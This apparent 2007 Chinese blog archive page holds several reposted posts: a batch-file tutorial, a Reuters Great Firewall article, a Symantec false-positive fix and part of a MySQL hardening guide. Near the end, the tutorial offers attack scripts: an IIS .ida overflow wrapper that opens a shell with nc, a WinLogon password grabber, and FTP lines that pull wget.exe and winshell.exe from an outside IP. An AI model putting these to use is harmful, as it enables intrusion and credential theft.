2007年6月26日星期二

[转载]BAT编写详细手册

首先,批处理文件是一个文本文件,这个文件的每一行都是一条DOS命令(大部分时候就好象我们在DOS提示符下执行的命令行一样),你可以使用DOS下的Edit或者Windows的记事本(notepad)等任何文本文件编辑工具创建和修改批处理文件。

其次,批处理文件是一种简单的程序,可以通过条件语句(if)和流程控制语句(goto)来控制命令运行的流程,在批处理中也可以使用循环语句(for)来循环执行一条命令。当然,批处理文件的编程能力与C语言等编程语句比起来是十分有限的,也是十分不规范的。批处理的程序语句就是一条条的 DOS命令(包括内部命令和外部命令),而批处理的能力主要取决于你所使用的命令。

第三,每个编写好的批处理文件都相当于一个DOS的外部命令,你可以把它所在的目录放到你的DOS搜索路径(path)中来使得它可以在任意位置运行。一个良好的习惯是在硬盘上建立一个bat或者batch 目录(例如C:\BATCH),然后将所有你编写的批处理文件放到该目录中,这样只要在path中设置上c:\batch,你就可以在任意位置运行所有你编写的批处理程序。

第四,在DOS和Win9x/Me系统下,C:盘根目录下的AUTOEXEC.BAT批处理文件是自动运行批处理文件,每次系统启动时会自动运行该文件,你可以将系统每次启动时都要运行的命令放入该文件中,例如设置搜索路径,调入鼠标驱动和磁盘缓存,设置系统环境变量等。下面是一个运行于Windows 98下的autoexec.bat的示例:

@ECHO OFF

PATH C:\WINDOWS;C:\WINDOWS\COMMAND;C:\UCDOS;C:\DOSTools;C:\SYSTOOLS;C:\WINTOOLS;C:\BATCH

LH SMARTDRV.EXE /X

LH DOSKEY.COM /INSERT

LH CTMOUSE.EXE

SET TEMP=D:\TEMP

SET TMP=D:\TEMP

批处理的作用

简单的说,批处理的作用就是自动的连续执行多条命令。

这里先讲一个最简单的应用:在启动wps软件时,每次都必须执行(>前面内容表示DOS提示符):

C:\>cd wps

C:\WPS>spdos

C:\WPS>py

C:\WPS>wbx

C:\WPS>wps

如果每次用WPS之前都这样执行一遍,您是不是觉得很麻烦呢?

好了,用批处理,就可以实现将这些麻烦的操作简单化,首先我们编写一个runwps.bat批处理文件,内容如下:

@echo off

c:

cd\wps

spdos

py

wbx

wps

cd\

以后,我们每次进入wps,只需要运行runwps这个批处理文件即可。

常用命令

echo、@、call、pause、rem(小技巧:用::代替rem)是批处理文件最常用的几个命令,我们就从他们开始学起。

echo 表示显示此命令后的字符

echo off 表示在此语句后所有运行的命令都不显示命令行本身

@与echo off相象,但它是加在每个命令行的最前面,表示运行时不显示这一行的命令行(只能影响当前行)。

call 调用另一个批处理文件(如果不用call而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令)。

pause 运行此句会暂停批处理的执行并在屏幕上显示Press any key to continue...的提示,等待用户按任意键后继续

rem 表示此命令后的字符为解释行(注释),不执行,只是给自己今后参考用的(相当于程序中的注释)。

例1:用edit编辑a.bat文件,输入下列内容后存盘为c:\a.bat,执行该批处理文件后可实现:将根目录中所有文件写入 a.txt中,启动UCDOS,进入WPS等功能。

  批处理文件的内容为: 命令注释:

@echo off           不显示后续命令行及当前命令行

dir c:\*.* >a.txt       将c盘文件列表写入a.txt

call c:\ucdos\ucdos.bat    调用ucdos

echo 你好 显示"你好"

pause 暂停,等待按键继续

rem 准备运行wps 注释:准备运行wps

cd ucdos 进入ucdos目录

wps 运行wps

批处理文件的参数

批处理文件还可以像C语言的函数一样使用参数(相当于DOS命令的命令行参数),这需要用到一个参数表示符"%"。

%[1-9]表示参数,参数是指在运行批处理文件时在文件名后加的以空格(或者Tab)分隔的字符串。变量可以从%0到%9,%0表示批处理命令本身,其它参数字符串用%1到%9顺序表示。

例2:C:根目录下有一批处理文件名为f.bat,内容为:

@echo off

format %1

如果执行C:\>f a:

那么在执行f.bat时,%1就表示a:,这样format %1就相当于format a:,于是上面的命令运行时实际执行的是format a:

例3:C:根目录下一批处理文件名为t.bat,内容为:

@echo off

type %1

type %2

那么运行C:\>t a.txt b.txt

%1 : 表示a.txt

%2 : 表示b.txt

于是上面的命令将顺序地显示a.txt和b.txt文件的内容。

特殊命令

if goto choice for是批处理文件中比较高级的命令,如果这几个你用得很熟练,你就是批处理文件的专家啦。

一、if 是条件语句,用来判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:

1、if [not] "参数" == "字符串" 待执行的命令

参数如果等于(not表示不等,下同)指定的字符串,则条件成立,运行命令,否则运行下一句。

例:if "%1"=="a" format a:

2、if [not] exist [路径\]文件名 待执行的命令

如果有指定的文件,则条件成立,运行命令,否则运行下一句。

如: if exist c:\config.sys type c:\config.sys

表示如果存在c:\config.sys文件,则显示它的内容。

3、if errorlevel <数字> 待执行的命令

很多DOS程序在运行结束后会返回一个数字值用来表示程序运行的结果(或者状态),通过if errorlevel命令可以判断程序的返回值,根据不同的返回值来决定执行不同的命令(返回值必须按照从大到小的顺序排列)。如果返回值等于指定的数字,则条件成立,运行命令,否则运行下一句。

如if errorlevel 2 goto x2

二、goto 批处理文件运行到这里将跳到goto所指定的标号(标号即label,标号用:后跟标准字符串来定义)处,goto语句一般与if配合使用,根据不同的条件来执行不同的命令组。

如:

goto end

:end

echo this is the end

标号用":字符串"来定义,标号所在行不被执行。

三、choice 使用此命令可以让用户输入一个字符(用于选择),从而根据用户的选择返回不同的errorlevel,然后于if errorlevel配合,根据用户的选择运行不同的命令。

注意:choice命令为DOS或者Windows系统提供的外部命令,不同版本的choice命令语法会稍有不同,请用choice /?查看用法。

choice的命令语法(该语法为Windows 2003中choice命令的语法,其它版本的choice的命令语法与此大同小异):

CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text]

描述:

该工具允许用户从选择列表选择一个项目并返回所选项目的索引。

参数列表:

/C choices 指定要创建的选项列表。默认列表是 "YN"。

/N         在提示符中隐藏选项列表。提示前面的消息得到显示,选项依旧处于启用状态。

/CS 允许选择分大小写的选项。在默认情况下,这个工具是不分大小写的。

/T timeout 做出默认选择之前,暂停的秒数。可接受的值是从 0 到 9999。如果指定了 0,就不会有暂停,默认选项

           会得到选择。

/D choice    在 nnnn 秒之后指定默认选项。字符必须在用 /C 选项指定的一组选择中; 同时,必须用 /T 指定 nnnn。

/M text     指定提示之前要显示的消息。如果没有指定,工具只显示提示。

/?         显示帮助消息。

 注意:

ERRORLEVEL 环境变量被设置为从选择集选择的键索引。列出的第一个选择返回 1,第二个选择返回 2,等等。如果用户按的键不是有效的选择,该工具会发出警告响声。如果该工具检测到错误状态,它会返回 255 的ERRORLEVEL 值。如果用户按 Ctrl+Break 或 Ctrl+C 键,该工具会返回 0 的 ERRORLEVEL 值。在一个批程序中使用 ERRORLEVEL 参数时,将参数降序排列。

示例:

CHOICE /?

CHOICE /C YNC /M "确认请按 Y,否请按 N,或者取消请按 C。"

CHOICE /T 10 /C ync /CS /D y

CHOICE /C ab /M "选项 1 请选择 a,选项 2 请选择 b。"

CHOICE /C ab /N /M "选项 1 请选择 a,选项 2 请选择 b。"

如果我运行命令:CHOICE /C YNC /M "确认请按 Y,否请按 N,或者取消请按 C。"

屏幕上会显示:

确认请按 Y,否请按 N,或者取消请按 C。 [Y,N,C]?

例:test.bat的内容如下(注意,用if errorlevel判断返回值时,要按返回值从高到低排列):

@echo off

choice /C dme /M "defrag,mem,end"

if errorlevel 3 goto end

if errorlevel 2 goto mem

if errotlevel 1 goto defrag

:defrag

c:\dos\defrag

goto end

:mem

mem

goto end

:end

echo good bye

此批处理运行后,将显示"defrag,mem,end[D,M,E]?" ,用户可选择d m e ,然后if语句根据用户的选择作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,批处理运行结束。

四、for 循环命令,只要条件符合,它将多次执行同一命令。

语法:

对一组文件中的每一个文件执行某个特定命令。

FOR %%variable IN (set) DO command [command-parameters]

%%variable    指定一个单一字母可替换的参数。

(set)      指定一个或一组文件。可以使用通配符。

command     指定对每个文件执行的命令。

command-parameters 为特定命令指定参数或命令行开关。

例如一个批处理文件中有一行:

for %%c in (*.bat *.txt) do type %%c

则该命令行会显示当前目录下所有以bat和txt为扩展名的文件的内容。

批处理示例

1. IF-EXIST

1)

首先用记事本在C:\建立一个test1.bat批处理文件,文件内容如下:

@echo off

IF EXIST \AUTOEXEC.BAT TYPE \AUTOEXEC.BAT

IF NOT EXIST \AUTOEXEC.BAT ECHO \AUTOEXEC.BAT does not exist

然后运行它:

C:\>TEST1.BAT

如果C:\存在AUTOEXEC.BAT文件,那么它的内容就会被显示出来,如果不存在,批处理就会提示你该文件不存在。

2)

接着再建立一个test2.bat文件,内容如下:

@ECHO OFF

IF EXIST \%1 TYPE \%1

IF NOT EXIST \%1 ECHO \%1 does not exist

执行:

C:\>TEST2 AUTOEXEC.BAT

该命令运行结果同上。

说明:

(1) IF EXIST 是用来测试文件是否存在的,格式为

IF EXIST [路径+文件名] 命令

(2) test2.bat文件中的%1是参数,DOS允许传递9个批参数信息给批处理文件,分别为%1~%9(%0表示test2命令本身) ,这有点象编程中的实参和形参的关系,%1是形参,AUTOEXEC.BAT是实参。

3) 更进一步的,建立一个名为TEST3.BAT的文件,内容如下:

@echo off

IF "%1" == "A" ECHO XIAO

IF "%2" == "B" ECHO TIAN

IF "%3" == "C" ECHO XIN

如果运行:

C:\>TEST3 A B C

屏幕上会显示:

XIAO

TIAN

XIN

如果运行:

C:\>TEST3 A B

屏幕上会显示

XIAO

TIAN

在这个命令执行过程中,DOS会将一个空字符串指定给参数%3。

2、IF-ERRORLEVEL

建立TEST4.BAT,内容如下:

@ECHO OFF

XCOPY C:\AUTOEXEC.BAT D:IF ERRORLEVEL 1 ECHO 文件拷贝失败

IF ERRORLEVEL 0 ECHO 成功拷贝文件

然后执行文件:

C:\>TEST4

如果文件拷贝成功,屏幕就会显示"成功拷贝文件",否则就会显示"文件拷贝失败"。

IF ERRORLEVEL 是用来测试它的上一个DOS命令的返回值的,注意只是上一个命令的返回值,而且返回值必须依照从大到小次序顺序判断。因此下面的批处理文件是错误的:

@ECHO OFF

XCOPY C:\AUTOEXEC.BAT D:\

IF ERRORLEVEL 0 ECHO 成功拷贝文件

IF ERRORLEVEL 1 ECHO 未找到拷贝文件

IF ERRORLEVEL 2 ECHO 用户通过ctrl-c中止拷贝操作

IF ERRORLEVEL 3 ECHO 预置错误阻止文件拷贝操作

IF ERRORLEVEL 4 ECHO 拷贝过程中写盘错误

无论拷贝是否成功,后面的:

未找到拷贝文件

用户通过ctrl-c中止拷贝操作

预置错误阻止文件拷贝操作

拷贝过程中写盘错误

都将显示出来。

以下就是几个常用命令的返回值及其代表的意义:

backup

0 备份成功

1 未找到备份文件

2 文件共享冲突阻止备份完成

3 用户用ctrl-c中止备份

4 由于致命的错误使备份操作中止

diskcomp

0 盘比较相同

1 盘比较不同

2 用户通过ctrl-c中止比较操作

3 由于致命的错误使比较操作中止

4 预置错误中止比较

diskcopy

0 盘拷贝操作成功

1 非致命盘读/写错

2 用户通过ctrl-c结束拷贝操作

3 因致命的处理错误使盘拷贝中止

4 预置错误阻止拷贝操作

format

0 格式化成功

3 用户通过ctrl-c中止格式化处理

4 因致命的处理错误使格式化中止

5 在提示"proceed with format(y/n)?"下用户键入n结束

xcopy

0 成功拷贝文件

1 未找到拷贝文件

2 用户通过ctrl-c中止拷贝操作

4 预置错误阻止文件拷贝操作

5 拷贝过程中写盘错误

3、IF STRING1 == STRING2

建立TEST5.BAT,文件内容如下:

@echo off

IF "%1" == "A" formAT A:

执行:

C:\>TEST5 A

屏幕上就出现是否将A:盘格式化的内容。

注意:为了防止参数为空的情况,一般会将字符串用双引号(或者其它符号,注意不能使用保留符号)括起来。

如:if [%1]==[A] 或者 if %1*==A*

5、GOTO

建立TEST6.BAT,文件内容如下:

@ECHO OFF

IF EXIST C:\AUTOEXEC.BAT GOTO _COPY

GOTO _DONE

:_COPY

COPY C:\AUTOEXEC.BAT D:\

:_DONE

注意:

(1) 标号前是ASCII字符的冒号":",冒号与标号之间不能有空格。

(2) 标号的命名规则与文件名的命名规则相同。

(3) DOS支持最长八位字符的标号,当无法区别两个标号时,将跳转至最近的一个标号。

6、FOR

建立C:\TEST7.BAT,文件内容如下:

@ECHO OFF

FOR %%C IN (*.BAT *.TXT *.SYS) DO TYPE %%C

运行:

C:>TEST7

执行以后,屏幕上会将C:盘根目录下所有以BAT、TXT、SYS为扩展名的文件内容显示出来(不包括隐藏文件)。

win2000命令行方式批处理BAT文件技巧

文章结构

1. 所有内置命令的帮助信息

2. 环境变量的概念

3. 内置的特殊符号(实际使用中间注意避开)

4. 简单批处理文件概念

5. 附件1 tmp.txt

6. 附件2 sample.bat

###########################

1. 所有内置命令的帮助信息

###########################

ver

cmd /?

set /?

rem /?

if /?

echo /?

goto /?

for /?

shift /?

call /?

其他需要的常用命令

type /?

find /?

findstr /?

copy /?

下面将所有上面的帮助输出到一个文件

echo ver >tmp.txt

ver >>tmp.txt

echo cmd /? >>tmp.txt

cmd /? >>tmp.txt

echo rem /? >>tmp.txt

rem /? >>tmp.txt

echo if /? >>tmp.txt

if /? >>tmp.txt

echo goto /? >>tmp.txt

goto /? >>tmp.txt

echo for /? >>tmp.txt

for /? >>tmp.txt

echo shift /? >>tmp.txt

shift /? >>tmp.txt

echo call /? >>tmp.txt

call /? >>tmp.txt

echo type /? >>tmp.txt

type /? >>tmp.txt

echo find /? >>tmp.txt

find /? >>tmp.txt

echo findstr /? >>tmp.txt

findstr /? >>tmp.txt

echo copy /? >>tmp.txt

copy /? >>tmp.txt

type tmp.txt

#############################

2. 环境变量的概念

#############################

C:\Program Files>set

ALLUSERSPROFILE=C:\Documents and Settings\All Users

CommonProgramFiles=C:\Program Files\Common Files

COMPUTERNAME=FIRST

ComSpec=C:\WINNT\system32\cmd.exe

NUMBER_OF_PROCESSORS=1

OS=Windows_NT

Os2LibPath=C:\WINNT\system32\os2\dll;

Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM

PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel

PROCESSOR_LEVEL=6

PROCESSOR_REVISION=0605

ProgramFiles=C:\Program Files

PROMPT=$P$G

SystemDrive=C:

SystemRoot=C:\WINNT

TEMP=C:\WINNT\TEMP

TMP=C:\WINNT\TEMP

USERPROFILE=C:\Documents and Settings\Default User

windir=C:\WINNT

path: 表示可执行程序的搜索路径. 我的建议是你把你的程序copy 到

%windir%\system32\. 这个目录里面. 一般就可以自动搜索到.

语法: copy mychenxu.exe %windir%\system32\.

使用点(.) 便于一目了然

对环境变量的引用使用(英文模式,半角)双引号

%windir% 变量

%%windir%% 二次变量引用.

我们常用的还有

%temp% 临时文件目录

%windir% 系统目录

%errorlevel% 退出代码

输出文件到临时文件目录里面.这样便于当前目录整洁.

对有空格的参数. 你应该学会使用双引号("") 来表示比如对porgram file文件夹操作

C:\>dir p*

C:\ 的目录

2000-09-02 11:47 2,164 PDOS.DEF

1999-01-03 00:47

Program Files

1 个文件 2,164 字节

1 个目录 1,505,997,824 可用字节

C:\>cd pro*

C:\Program Files>

C:\>

C:\>cd "Program Files"

C:\Program Files>

############################################

3. 内置的特殊符号(实际使用中间注意避开)

############################################

微软里面内置了下列字符不能够在创建的文件名中间使用

con nul aux \ / | || && ^ > < *

You can use most characters as variable values, including white space. If you use the special characters <, >, |, &, or ^, you must precede them with the escape character (^) or quotation marks. If you use quotation marks, they are included as part of the value because everything following the equal sign is taken as the value. Consider the following examples:

(大意: 要么你使用^作为前导字符表示.或者就只有使用双引号""了)

To create the variable value new&name, type:

set varname=new^&name

To create the variable value "new&name", type:

set varname="new&name"

The ampersand (&), pipe (|), and parentheses ( ) are special characters that must be preceded by the escape character (^) or quotation marks when you pass them as arguments.

find "Pacific Rim" <> nwtrade.txt

IF EXIST filename. (del filename.) ELSE echo filename. missing

> 创建一个文件

>> 追加到一个文件后面

@ 前缀字符.表示执行时本行在cmd里面不显示, 可以使用 echo off关闭显示

^ 对特殊符号( > < &)的前导字符. 第一个只是显示aaa 第二个输出文件bbb

echo 123456 ^> aaa

echo 1231231 > bbb

() 包含命令

(echo aa &amp; echo bb)

, 和空格一样的缺省分隔符号.

; 注释,表示后面为注释

: 标号作用

| 管道操作

& Usage:第一条命令 & 第二条命令 [& 第三条命令...]

用这种方法可以同时执行多条命令,而不管命令是否执行成功

dir c:\*.exe & dir d:\*.exe & dir e:\*.exe

&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...]

当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令;

|| Usage:第一条命令 || 第二条命令 [|| 第三条命令...]

当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;

常用语法格式

IF [NOT] ERRORLEVEL number command para1 para2

IF [NOT] string1==string2 command para1 para2

IF [NOT] EXIST filename command para1 para2

IF EXIST filename command para1 para2

IF NOT EXIST filename command para1 para2

IF "%1"=="" goto END

IF "%1"=="net" goto NET

IF NOT "%2"=="net" goto OTHER

IF ERRORLEVEL 1 command para1 para2

IF NOT ERRORLEVEL 1 command para1 para2

FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k

按照字母顺序 ijklmnopq依次取参数.

eol=c - 指一个行注释字符的结尾(就一个)

skip=n - 指在文件开始时忽略的行数。

delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。

########################

4. 简单批处理文件概念

########################

echo This is test > a.txt

type a.txt

echo This is test 11111 >> a.txt

type a.txt

echo This is test 22222 > a.txt

type a.txt

第二个echo是追加

第三个echo将清空a.txt 重新创建 a.txt

netstat -n | find "3389"

这个将要列出所有连接3389的用户的ip.

________________test.bat______

@echo please care

echo plese care 1111

echo plese care 2222

echo plese care 3333

@echo please care

@echo plese care 1111

@echo plese care 2222

@echo plese care 3333

rem 不显示注释语句,本行显示

@rem 不显示注释语句,本行不显示

@if exist %windir%\system32\find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe)

@if exist %windir%\system32\fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe)

_____________________________

下面我们以具体的一个idahack程序就是ida远程溢出为例子.应该是很简单的.

___________________ida.bat_____

@rem ver 1.0

@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe"

@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe"

@if "%1" =="" goto USAGE

@if NOT "%2" =="" goto SP2

:start

@echo Now start ...

@ping %1

@echo chinese win2k:1 sp1:2 sp2:3

idahack.exe %1 80 1 99 >%temp%\_tmp

@echo "prog exit code [%errorlevel%] idahack.exe"

@type %temp%\_tmp

@find "good luck :)" %temp%\_tmp

@echo "prog exit code [%errorlevel%] find [goog luck]"

@if NOT errorlevel 1 nc.exe %1 99

@goto END

:SP2

@idahack.exe %1 80 %2 99 %temp%\_tmp

@type %temp%\_tmp

@find "good luck :)" %temp%\_tmp

@if NOT errorlevel 1 nc.exe %1 99

@goto END

:USAGE

@echo Example: ida.bat IP

@echo Example: ida.bat IP (2,3)

:END

_____________________ida.bat__END_______

下面我们再来第二个文件.就是得到administrator的口令.

大多数人说得不到.其实是自己的没有输入正确的信息.

___________________________fpass.bat____________________________________________

@rem ver 1.0

@if NOT exist %windir %\system32\findpass.exe echo "ERROR: dont find findpass.exe"

@if NOT exist %windir %\system32\pulist.exe echo "ERROR: dont find pulist.exe"

@echo start....

@echo ____________________________________

@if "%1"=="" goto USAGE

@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt

@echo "prog exit code [%errorlevel%] findpass.exe"

@type %temp%\_findpass.txt

@echo ________________________________Here__pass★★★★★★★★

@ipconfig /all >>%temp%\_findpass.txt

@goto END

:USAGE

@pulist.exe >%temp%\_pass.txt

@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt

@echo "Example: fpass.bat %1 %2 %3 %4 !!!"

@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon"

:END

@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "

@echo " fpass.bat end [%errorlevel%] !"

_________________fpass.bat___END___________________________________________________________

还有一个就是已经通过telnet登陆了一个远程主机.怎样上传文件(win)

依次在窗口输入下面的东西. 当然了也可以全部拷贝.Ctrl+V过去. 然后就等待吧!!

echo open 210.64.x.4 3396>w

echo read>>w

echo read>>w

echo cd winnt>>w

echo binary>>w

echo pwd >>w

echo get wget.exe >>w

echo get winshell.exe >>w

echo get any.exe >>w

echo quit >>w

ftp -s:w

2007年6月20日星期三

[转载]Blocked China Web users rage against Great Firewall

An internet user browses for information on the Chinese version of search engine Google in Beijing in this January 25, 2006 file photo. China employs a complex system of filters and an army of tens of thousands of human monitors to survey the country's 140 million Internet users' surfing habits and surgically clip sensitive content from in front of their eyes. (REUTERS/Stringer/Files)


June 20, 2007

BEIJING (Reuters) - Yang Zhou is no cyberdissident, but recent curbs on his Web surfing habits by China's censors have him fomenting discontent about China's "Great Firewall."

Yang's fury erupted a few days ago when he found he could not browse his friend's holiday snaps on Flickr.com, due to access restrictions by censors after images of the 1989 Tiananmen Square massacre were posted on the photo-sharing Web site."
"Once you've complained all you can to your friends, what more can you do? What else is there but anger and disillusionment?" Yang said after venting his anger with friends at a hot-pot restaurant in Beijing.

The blocking of Flickr is the latest casualty of China's ongoing battle to control its sprawling Internet. Wikipedia, and a raft of other popular Web sites, discussion boards and blogs have already fallen victim to the country's censors.

China employs a complex system of filters and an army of tens of thousands of human monitors to survey the country's 140 million Internet users' surfing habits and surgically clip sensitive content from in front of their eyes.

Its stability-obsessed government says the surveillance machinery, commonly known as the "Great Firewall," is necessary to let Internet users enjoy a "healthy" online environment and build a "harmonious" society.

Yang just thinks it's a pain.

"I just want to look at some photos! What's wrong with that?" said the 24-year-old accountant, typical of millions of young urban-dwelling professionals who are increasingly aware of and fed up with state intrusions into their private life.

Privacy, once regarded with suspicion in pre-reform China, has become a sought-after commodity among China's burgeoning middle class, according to Nicholas Bequelin from Hong Kong-based Human Rights Watch.

"Of course, it's the first thing people seek when they have the economic resources," Bequelin said. "We see this growing in China in the wake of ideas of ownership and property."

PRIVACY BATTLES

Away from cyberspace, the battle for privacy between China's secretive government and its increasingly active citizens has turned violent in recent months.

In Bobai county, in the southern region of Guangxi, hundreds of farmers smashed government offices and burnt cars after local officials imposed punitive fines on residents who had defied family planning laws and had too many children.

The battle for control of China's Internet, however, will remain much more covert than confrontational, according to Liu Bin, an IT consultant with Beijing-based consulting firm BDA.

He believes it will take a long time before the government loosens control over web content, especially because the Internet-savvy middle class is unlikely to take to the streets -- like the farmers of Bobai county -- over lack of web access.

"Many educated people feel they can accept the current status quo because it doesn't have much impact on their daily lives ... They have been living with government propaganda for over 1,000 years," Liu said.

Such an attitude grates on Du Dongjin, a 40 year-old IT worker in Shanghai.

Du has decided to sue his Internet service provider, the Shanghai branch of state-owned behemoth China Telecom, who he said had blocked a Web site that had carried financial software he hoped to market.

"If the court authorities aren't influenced and they can hear the case fairly, I will win," Du said.

ANONYMOUS GRIEVANCES

Most frustrated Web surfers, however, would rather air their grievances in the relatively safe realms of Internet anonymity.

They still have their anonymity because a state push to have China's millions of bloggers register with their real names to ensure they only posted "responsible" Web content was abandoned after an outcry from the Internet industry and due to the impossible task of keeping lists of exploding numbers of users.

"The thirst for information in China is so strong, it is very difficult for the (Communist) Party to stay ahead of the curve," Bequelin explained.

Within days of the blocking of Flickr, links to browser plug-ins and how-to explanations to subvert the filters and see Flickr photos were gleefully posted on blogs and in chat-rooms.

Many posts were preceded by tirades against the censors for "harmonizing" Flickr.

One blogger posted an image of a voodoo doll, calling it the Great Firewall and inviting users to -- digitally -- stick pins in it.

Yang said restrictions on Flickr probably wouldn't motivate him to write a blog, much less push him down the road of "potentially dangerous" activism.

But he liked the idea of the Great Firewall voodoo doll.

"Have you got the link? Maybe I'll go stick a pin in it," he said.

2007年5月25日星期五

诺顿误杀netapi32.dll官方解决方案

赛门铁克针对企业及个人在下载问题病毒库后误删系统文件的情况,官方对此问题给出了相应的解决方案,分别针对服务器端及客户端
Backdoor.haxdoor临时解决方案

  Version: 1.4

  在windows XP sp2简体中文版打上补丁KB924270以后,SAV更新到5月17日的病毒定义以后,会把C:\windows\system32\ netapi32.dll和 C:\windows\system32\lsasrv.dll认为是backdoor.haxdoor, 并且把他们隔离掉。 会造成重起机器后无法进入系统,安全模式也无法进入,蓝屏。

  服务器

  立即liveupdate, 更新到最新的病毒定义库(20070517.v73)。

  如果liveupdate有问题,请从这里进入到68645或者以后的文件夹,下载后缀名是xdb的文件,放到服务器的SAV安装文件夹里面(是个共享文件夹,一般的位置是C:\program files\SAV或者C:\program files\SAV\symantec antivirus. 如果服务器内装有winzip等软件,可能会把这个XDB改成zip或者rar, 需要改回到xdb)。

  客户端

  可以从服务器下载到更新后的病毒定义,对于无法从服务器自动更新病毒定义的客户端,请从这里进入到68645或者以后的文件夹,下载 ****x86.exe文件,在本机运行更新病毒定义。出现过这个问题的电脑,理论上SAV下载更新的病毒定义后,会扫描隔离区,发现误报的dll文件后会自动修复并恢复到原来的位置,这些已经有很多用户确认。

  但是为保险起见,建议用户在工作量允许得前提下,用windows XP盘里面的i386下面的netapi32.dll和lsasvr.dll文件,替换C:\windows\system32下的这两个文件。

  对于已经蓝屏的电脑:

  1, 使用windows XP安装盘启动

  2, 进入系统恢复控制台。

  3, 使用安装盘I386目录下的netapi32.dll和lsasrv.dll文件替换系统system32下和dllcache下的文件

  a. cd \windows\system32

  b. expand (CD drive letter):\i386\netapi32.dl_

  c. expand (CD drive letter):\i386\lsasrv.dl_

  d. cd dllcache

  e. expand (CD drive letter):\i386\netapi32.dl_

  f. expand (CD drive letter):\i386\lsasrv.dl_

  4, 重启电脑

  5,更新到前面所述的新的病毒定义。

2007年5月22日星期二

[转载]详细讲解MySQL数据库的安全配置

  MySQL 是完全网络化的跨平台关系型数据库系统,同时是具有客户机/服务器体系结构的分布式数据库管理系统。它具有功能强、使用简便、管理方便、运行速度快、安全可靠性强等优点,用户可利用许多语言编写访问MySQL 数据库的程序,特别是与PHP更是黄金组合,运用十分广泛。

  由于MySQL是多平台的数据库,它的默认配置要考虑各种情况下都能适用,所以在我们自己的使用环境下应该进行进一步的安全加固。作为一个MySQL的系统管理员,我们有责任维护MySQL数据库系统的数据安全性和完整性。

  MySQL数据库的安全配置必须从两个方面入手,系统内部安全和外部网络安全,另外我们还将简单介绍编程时要注意的一些问题以及一些小窍门。

2、系统内部安全:

  首先简单介绍一下MySQL数据库目录结构。MySQL安装好,运行了mysql_db_install脚本以后就会建立数据目录和初始化数据库。如果我们用MySQL源码包安装,而且安装目录是/usr/local/mysql,那么数据目录一般会是/usr/local/mysql/var。数据库系统由一系列数据库组成,每个数据库包含一系列数据库表。MySQL是用数据库名在数据目录建立建立一个数据库目录,各数据库表分别以数据库表名作为文件名,扩展名分别为MYD、MYI、frm的三个文件放到数据库目录中。

  MySQL的授权表给数据库的访问提供了灵活的权限控制,但是如果本地用户拥有对库文件的读权限的话,攻击者只需把数据库目录打包拷走,然后拷到自己本机的数据目录下就能访问窃取的数据库。所以MySQL所在的主机的安全性是最首要的问题,如果主机不安全,被攻击者控制,那么MySQL的安全性也无从谈起。其次就是数据目录和数据文件的安全性,也就是权限设置问题。

  从MySQL主站一些老的binary发行版来看,3.21.xx版本中数据目录的属性是775,这样非常危险,任何本地用户都可以读数据目录,所以数据库文件很不安全。3.22.xx版本中数据目录的属性是770,这种属性也有些危险,本地的同组用户既能读也能写,所以数据文件也不安全。3.23.xx版本数据目录的属性是700,这样就比较好,只有启动数据库的用户可以读写数据库文件,保证了本地数据文件的安全。

  如果启动MySQL数据库的用户是MysqSQL,那么象如下的目录和文件的是安全的,请注意数据目录及下面的属性:

shell>ls -l /usr/local/mysql
total 40
drwxrwxr-x 2 root root 4096 Feb 27 20:07 bin
drwxrwxr-x 3 root root 4096 Feb 27 20:07 include
drwxrwxr-x 2 root root 4096 Feb 27 20:07 info
drwxrwxr-x 3 root root 4096 Feb 27 20:07 lib
drwxrwxr-x 2 root root 4096 Feb 27 20:07 libexec
drwxrwxr-x 3 root root 4096 Feb 27 20:07 man
drwxrwxr-x 6 root root 4096 Feb 27 20:07 mysql-test
drwxrwxr-x 3 root root 4096 Feb 27 20:07 share
drwxrwxr-x 7 root root 4096 Feb 27 20:07 sql-bench
drwx------ 4 mysql mysql 4096 Feb 27 20:07 var
shell>ls -l /usr/local/mysql/var
total 8
drwx------ 2 mysql mysql 4096 Feb 27 20:08 mysql
drwx------ 2 mysql mysql 4096 Feb 27 20:08 test
shell>ls -l /usr/local/mysql/var/mysql
total 104
-rw------- 1 mysql mysql 0 Feb 27 20:08 columns_priv.MYD
-rw------- 1 mysql mysql 1024 Feb 27 20:08 columns_priv.MYI
-rw------- 1 mysql mysql 8778 Feb 27 20:08 columns_priv.frm
-rw------- 1 mysql mysql 302 Feb 27 20:08 db.MYD
-rw------- 1 mysql mysql 3072 Feb 27 20:08 db.MYI
-rw------- 1 mysql mysql 8982 Feb 27 20:08 db.frm
-rw------- 1 mysql mysql 0 Feb 27 20:08 func.MYD
-rw------- 1 mysql mysql 1024 Feb 27 20:08 func.MYI
-rw------- 1 mysql mysql 8641 Feb 27 20:08 func.frm
-rw------- 1 mysql mysql 0 Feb 27 20:08 host.MYD
-rw------- 1 mysql mysql 1024 Feb 27 20:08 host.MYI
-rw------- 1 mysql mysql 8958 Feb 27 20:08 host.frm
-rw------- 1 mysql mysql 0 Feb 27 20:08 tables_priv.MYD
